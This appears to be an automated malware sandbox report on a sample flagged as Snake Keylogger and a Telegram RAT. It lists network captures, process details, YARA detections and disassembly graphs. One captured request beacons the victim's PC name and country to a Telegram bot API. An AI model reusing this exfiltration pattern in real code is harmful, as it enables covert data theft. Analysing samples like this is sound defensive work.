                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:38 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-27 08:47:38 UTC675INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:38 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1414
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPmkMBAVymc3%2BgInpZTi5oDEKaCoPZ3ihplQWHNkHz0QwyCACV%2BoGdPjInxxlMsRjnHtIeZX%2F74WPrDyeRq0NwQefKgLRJY7uUPyzIIl6pn67NY1uHymzrZ2OzcwItzGB60cAPyJ"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3aec3d65c477-EWR
                                                                                  2024-09-27 08:47:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.749715188.114.97.34436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:40 UTC671INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:40 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1416
                                                                                  Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAH1x9VBcGUM%2FcrKC64XDVOGK7eR2MhGHsoidl4jGiZiVecBrl1mlxNofBiZkUSjEJNFl0j0h0x6ObkkiDk3mtbAcvbZOEoMoGYfER9tyn0tVZ0fPHnJPrq7YYKz0KM8Nn5pAbd0"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8c9a3af50d0e0ccd-EWR
                                                                                  2024-09-27 08:47:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-27 08:47:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.749716149.154.167.2204436764C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-27 08:47:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                  Host: api.telegram.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-27 08:47:41 UTC344INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.18.0
                                                                                  Date: Fri, 27 Sep 2024 08:47:41 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 55
                                                                                  Connection: close
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                  2024-09-27 08:47:41 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:04:47:27
                                                                                  Start date:27/09/2024
                                                                                  Path:C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"
                                                                                  Imagebase:0x700000
                                                                                  File size:279'040 bytes
                                                                                  MD5 hash:B046211FE3F420A9CEB7663A560ECE96
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:04:47:41
                                                                                  Start date:27/09/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
                                                                                  Imagebase:0x720000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:18.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:71.4%
                                                                                    Total number of Nodes:28
                                                                                    Total number of Limit Nodes:2
                                                                                    execution_graph 19421 ece018 19422 ece024 19421->19422 19429 6701970 19422->19429 19434 6701962 19422->19434 19423 ece0c3 19439 670e950 19423->19439 19443 670e942 19423->19443 19424 ece110 19430 6701992 19429->19430 19431 6701a5e 19430->19431 19447 6708688 19430->19447 19451 6708a6c 19430->19451 19431->19423 19435 6701970 19434->19435 19436 6701a5e 19435->19436 19437 6708688 LdrInitializeThunk 19435->19437 19438 6708a6c LdrInitializeThunk 19435->19438 19436->19423 19437->19436 19438->19436 19440 670e972 19439->19440 19441 6708688 LdrInitializeThunk 19440->19441 19442 670ea3c 19440->19442 19441->19442 19442->19424 19444 670e950 19443->19444 19445 6708688 LdrInitializeThunk 19444->19445 19446 670ea3c 19444->19446 19445->19446 19446->19424 19449 67086b9 19447->19449 19448 6708819 19448->19431 19449->19448 19450 6708ba9 LdrInitializeThunk 19449->19450 19450->19448 19453 6708923 19451->19453 19452 6708ba9 LdrInitializeThunk 19454 6708bc1 19452->19454 19453->19452 19454->19431

                                                                                    Executed Functions

                                                                                    Function 00EC29E0 Relevance: 8.3, Strings: 6, Instructions: 844COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 ec29e0-ec2a3b 150 ec2a5d-ec2aac 146->150 151 ec2a3d-ec2a5c 146->151 155 ec2aae-ec2ab5 150->155 156 ec2ac7-ec2acf 150->156 157 ec2abe-ec2ac5 155->157 158 ec2ab7-ec2abc 155->158 159 ec2ad2-ec2ae6 156->159 157->159 158->159 162 ec2afc-ec2b04 159->162 163 ec2ae8-ec2aef 159->163 166 ec2b06-ec2b0a 162->166 164 ec2af5-ec2afa 163->164 165 ec2af1-ec2af3 163->165 164->166 165->166 168 ec2b0c-ec2b21 166->168 169 ec2b6a-ec2b6d 166->169 168->169 177 ec2b23-ec2b26 168->177 170 ec2b6f-ec2b84 169->170 171 ec2bb5-ec2bbb 169->171 170->171 181 ec2b86-ec2b8a 170->181 172 ec36b6 171->172 173 ec2bc1-ec2bc3 171->173 178 ec36bb-ec3c65 172->178 173->172 175 ec2bc9-ec2bce 173->175 179 ec3664-ec3668 175->179 180 ec2bd4 175->180 182 ec2b28-ec2b2a 177->182 183 ec2b45-ec2b63 call ec02c8 177->183 200 ec3c69-ec3ca4 178->200 185 ec366f-ec36b5 179->185 186 ec366a-ec366d 179->186 180->179 187 ec2b8c-ec2b90 181->187 188 ec2b92-ec2bb0 call ec02c8 181->188 182->183 189 ec2b2c-ec2b2f 182->189 183->169 186->178 186->185 187->171 187->188 188->171 189->169 193 ec2b31-ec2b43 189->193 193->169 193->183 200->200 202 ec3ca6-ec3cd9 200->202 206 ec3cea-ec3cf2 202->206 207 ec3cdb-ec3cdd 202->207 211 ec3cf4-ec3d02 206->211 208 ec3cdf-ec3ce1 207->208 209 ec3ce3-ec3ce8 207->209 208->211 209->211 213 ec3d18-ec3d20 211->213 214 ec3d04-ec3d06 211->214 217 ec3d23-ec3d26 213->217 215 ec3d0f-ec3d16 214->215 216 ec3d08-ec3d0d 214->216 215->217 216->217 219 ec3d3d-ec3d41 217->219 220 ec3d28-ec3d36 217->220 221 ec3d5a-ec3d5d 219->221 222 ec3d43-ec3d51 219->222 220->219 228 ec3d38 220->228 223 ec3d5f-ec3d63 221->223 224 ec3d65-ec3d9a 221->224 222->221 231 ec3d53 222->231 223->224 227 ec3d9c-ec3db3 223->227 233 ec3dfc-ec3e01 224->233 229 ec3db9-ec3dc5 227->229 230 ec3db5-ec3db7 227->230 228->219 234 ec3dcf-ec3dd9 229->234 235 ec3dc7-ec3dcd 229->235 230->233 231->221 236 ec3de1 234->236 237 ec3ddb 234->237 235->236 239 ec3de9-ec3df5 236->239 237->236 239->233
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Xq$Xq$Xq$Xq$Xq$Xq
                                                                                    • API String ID: 0-905847027
                                                                                    • Opcode ID: a86502281c009f346a2397237d49b92dcd7ddfeef0ca45ff3d90b1d073cb0545
                                                                                    • Instruction ID: f57814f8b0a031e06700cd7261b4aa55b53ce19286dba9b5c5ed57f3a173d20c
                                                                                    • Opcode Fuzzy Hash: a86502281c009f346a2397237d49b92dcd7ddfeef0ca45ff3d90b1d073cb0545
                                                                                    • Instruction Fuzzy Hash: DD420A6288D3C44FEB6286BC4D6D6EB7FB19B63210B4502AFC88396587F51E46078793
                                                                                    Function 00EC6FC8 Relevance: 6.8, Strings: 5, Instructions: 523COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$(oq$(oq$,q$,q
                                                                                    • API String ID: 0-189141485
                                                                                    • Opcode ID: f94ceef2bebe91ae3c15b06c779e4f06b7537c7246f69e62f79f234204de5130
                                                                                    • Instruction ID: 8da666941bfee21ff276c7d1e69e981286c445c7ac19b66bada15b980f433aab
                                                                                    • Opcode Fuzzy Hash: f94ceef2bebe91ae3c15b06c779e4f06b7537c7246f69e62f79f234204de5130
                                                                                    • Instruction Fuzzy Hash: 5B226D70A082099FCB14CF69DA84FADBBB2BF48314F159069E895EB261D736DC42CF51
                                                                                    Function 00EC9DE0 Relevance: 6.1, Strings: 4, Instructions: 1134COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$4'q$4'q$4'q
                                                                                    • API String ID: 0-2528434116
                                                                                    • Opcode ID: 312a21f28299ae5a0ddf6d4f1bec580d94fc588f3cfcb97d473feb5764684a60
                                                                                    • Instruction ID: 991565fc8a85ed858c2326b0b30d8241de428f3059adc7dcf3519b43856b73dd
                                                                                    • Opcode Fuzzy Hash: 312a21f28299ae5a0ddf6d4f1bec580d94fc588f3cfcb97d473feb5764684a60
                                                                                    • Instruction Fuzzy Hash: 86A25070A002098FCB15CF68C654FAEBBB2FF88318F199569E405EB265D736ED42CB51
                                                                                    Function 06704168 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: N
                                                                                    • API String ID: 0-1130791706
                                                                                    • Opcode ID: b6f0a7e8651188db8bdee3bdd8cc51b40aa3dd389642c72511e99e8142b48362
                                                                                    • Instruction ID: badaf0502033833eb3797f3cfc40b7477f8ec2e419807ca43ba6285e73e5cb63
                                                                                    • Opcode Fuzzy Hash: b6f0a7e8651188db8bdee3bdd8cc51b40aa3dd389642c72511e99e8142b48362
                                                                                    • Instruction Fuzzy Hash: 1273E531C1075ACEDB11EF68C854AA9F7B1FF99304F15C69AE44867261EB70AAC4CF81
                                                                                    Function 06708D58 Relevance: 3.5, Strings: 1, Instructions: 2261COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: K
                                                                                    • API String ID: 0-856455061
                                                                                    • Opcode ID: 95cf7afeb2f60ffff0aec3c5ccb3e2e7f072407c8d975c2b109c322a2fc7ddb1
                                                                                    • Instruction ID: 0a6f1b567a643285aeb06863dfb2c6ac2b40a126848bb530ab0cf6d832fa155f
                                                                                    • Opcode Fuzzy Hash: 95cf7afeb2f60ffff0aec3c5ccb3e2e7f072407c8d975c2b109c322a2fc7ddb1
                                                                                    • Instruction Fuzzy Hash: 4133E131C14719CEDB51EF68C884AADB7B1FF99300F14D69AE44867261EB70AAC4CF91
                                                                                    Function 00EC69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$Hq
                                                                                    • API String ID: 0-2917151738
                                                                                    • Opcode ID: b14d7119bb75691fbb28373994ba72d4706e91896143116daaf6a067d6f594cc
                                                                                    • Instruction ID: 9257cb20d5c5bfe525650c62ffd78441c149fd4a7772de5cde9d850a6f9f47d1
                                                                                    • Opcode Fuzzy Hash: b14d7119bb75691fbb28373994ba72d4706e91896143116daaf6a067d6f594cc
                                                                                    • Instruction Fuzzy Hash: 4F127D70A002198FDB14DF69D954BAEBBB2FF88304F24852DE506EB391DB359D42DB90
                                                                                    Function 00ECC146 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2570 ecc146-ecc158 2571 ecc15a-ecc172 2570->2571 2572 ecc184 2570->2572 2576 ecc17b-ecc17e 2571->2576 2577 ecc174-ecc179 2571->2577 2573 ecc186-ecc18a 2572->2573 2578 ecc18b-ecc199 2576->2578 2579 ecc180-ecc182 2576->2579 2577->2573 2581 ecc19b-ecc19d 2578->2581 2582 ecc1c6-ecc1c8 2578->2582 2579->2571 2579->2572 2583 ecc19f-ecc1a1 2581->2583 2584 ecc1ca 2581->2584 2582->2584 2585 ecc1cf-ecc1fc 2582->2585 2587 ecc1ce 2583->2587 2588 ecc1a3-ecc1c1 2583->2588 2584->2587 2586 ecc203-ecc2ac call ec41a0 call ec3cc0 2585->2586 2598 ecc2ae 2586->2598 2599 ecc2b3-ecc2d4 call ec5658 2586->2599 2587->2585 2587->2586 2588->2582 2598->2599 2601 ecc2d9-ecc2e4 2599->2601 2602 ecc2eb-ecc2ef 2601->2602 2603 ecc2e6 2601->2603 2604 ecc2f4-ecc2fb 2602->2604 2605 ecc2f1-ecc2f2 2602->2605 2603->2602 2607 ecc2fd 2604->2607 2608 ecc302-ecc310 2604->2608 2606 ecc313-ecc357 2605->2606 2612 ecc3bd-ecc3d4 2606->2612 2607->2608 2608->2606 2614 ecc359-ecc36f 2612->2614 2615 ecc3d6-ecc3fb 2612->2615 2619 ecc399 2614->2619 2620 ecc371-ecc37d 2614->2620 2621 ecc3fd-ecc412 2615->2621 2622 ecc413 2615->2622 2625 ecc39f-ecc3bc 2619->2625 2623 ecc37f-ecc385 2620->2623 2624 ecc387-ecc38d 2620->2624 2621->2622 2626 ecc397 2623->2626 2624->2626 2625->2612 2626->2625
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: 7ae7ae46bb873b882c74b26bb0c42f9befb918243a0ab51cf271a9d0c7470b4f
                                                                                    • Instruction ID: cb385974526d2483bc39ece802da63403ebcd13a247652504eee26dff7ad13a2
                                                                                    • Opcode Fuzzy Hash: 7ae7ae46bb873b882c74b26bb0c42f9befb918243a0ab51cf271a9d0c7470b4f
                                                                                    • Instruction Fuzzy Hash: 5DA1D875E00258CFDB14DFAAD984B9DBBF2BF89304F249069E409AB361DB319942CF50
                                                                                    Function 00EC5362 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2630 ec5362-ec5364 2631 ec53c4-ec5484 call ec41a0 call ec3cc0 2630->2631 2632 ec5366-ec53a0 2630->2632 2644 ec548b-ec54a9 2631->2644 2645 ec5486 2631->2645 2633 ec53a7-ec53c2 2632->2633 2634 ec53a2 2632->2634 2633->2631 2634->2633 2675 ec54ac call ec5658 2644->2675 2676 ec54ac call ec5649 2644->2676 2645->2644 2646 ec54b2-ec54bd 2647 ec54bf 2646->2647 2648 ec54c4-ec54c8 2646->2648 2647->2648 2649 ec54cd-ec54d4 2648->2649 2650 ec54ca-ec54cb 2648->2650 2652 ec54db-ec54e9 2649->2652 2653 ec54d6 2649->2653 2651 ec54ec-ec5530 2650->2651 2657 ec5596-ec55ad 2651->2657 2652->2651 2653->2652 2659 ec55af-ec55d4 2657->2659 2660 ec5532-ec5548 2657->2660 2667 ec55ec 2659->2667 2668 ec55d6-ec55eb 2659->2668 2664 ec554a-ec5556 2660->2664 2665 ec5572 2660->2665 2669 ec5558-ec555e 2664->2669 2670 ec5560-ec5566 2664->2670 2666 ec5578-ec5595 2665->2666 2666->2657 2668->2667 2671 ec5570 2669->2671 2670->2671 2671->2666 2675->2646 2676->2646
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: f5738c725f30c40ab8e2569d67d9fe9a9be6de2655333b0469e3ffccfbc8bad2
                                                                                    • Instruction ID: d69a58d32598c5590f6b92166bc2e4316f1952c87f090357510e68e47bac84eb
                                                                                    • Opcode Fuzzy Hash: f5738c725f30c40ab8e2569d67d9fe9a9be6de2655333b0469e3ffccfbc8bad2
                                                                                    • Instruction Fuzzy Hash: 2991C375E002188FDB14DFA9D984B9DBBF2BF89300F149069D409BB365DB31A986CF10
                                                                                    Function 00ECC468 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2677 ecc468-ecc471 2678 ecc49e 2677->2678 2679 ecc473-ecc498 2677->2679 2680 ecc49f-ecc4cc 2678->2680 2682 ecc4d3-ecc57c call ec41a0 call ec3cc0 2678->2682 2679->2680 2681 ecc49a 2679->2681 2680->2682 2681->2678 2692 ecc57e 2682->2692 2693 ecc583-ecc5a4 call ec5658 2682->2693 2692->2693 2695 ecc5a9-ecc5b4 2693->2695 2696 ecc5bb-ecc5bf 2695->2696 2697 ecc5b6 2695->2697 2698 ecc5c4-ecc5cb 2696->2698 2699 ecc5c1-ecc5c2 2696->2699 2697->2696 2701 ecc5cd 2698->2701 2702 ecc5d2-ecc5e0 2698->2702 2700 ecc5e3-ecc627 2699->2700 2706 ecc68d-ecc6a4 2700->2706 2701->2702 2702->2700 2708 ecc629-ecc63f 2706->2708 2709 ecc6a6-ecc6cb 2706->2709 2713 ecc669 2708->2713 2714 ecc641-ecc64d 2708->2714 2715 ecc6cd-ecc6e2 2709->2715 2716 ecc6e3 2709->2716 2719 ecc66f-ecc68c 2713->2719 2717 ecc64f-ecc655 2714->2717 2718 ecc657-ecc65d 2714->2718 2715->2716 2720 ecc667 2717->2720 2718->2720 2719->2706 2720->2719
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PHq$PHq
                                                                                    • API String ID: 0-1274609152
                                                                                    • Opcode ID: bf7b9e0edcd8d74e6150011632f5f48310d2db85cb6bb027c32ccca43b9249ac
                                                                                    • Instruction ID: 58563d675c5971f591ad6782b1656a1de079aef7e636a392bb455fe67d152a2c
                                                                                    • Opcode Fuzzy Hash: bf7b9e0edcd8d74e6150011632f5f48310d2db85cb6bb027c32ccca43b9249ac
                                                                                    • Instruction Fuzzy Hash: 3A819374E00218CFDB14DFAAD944B9DBBF2BF89314F249069E419AB365DB315942CF50
                                                                                    Function 00ECD278 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
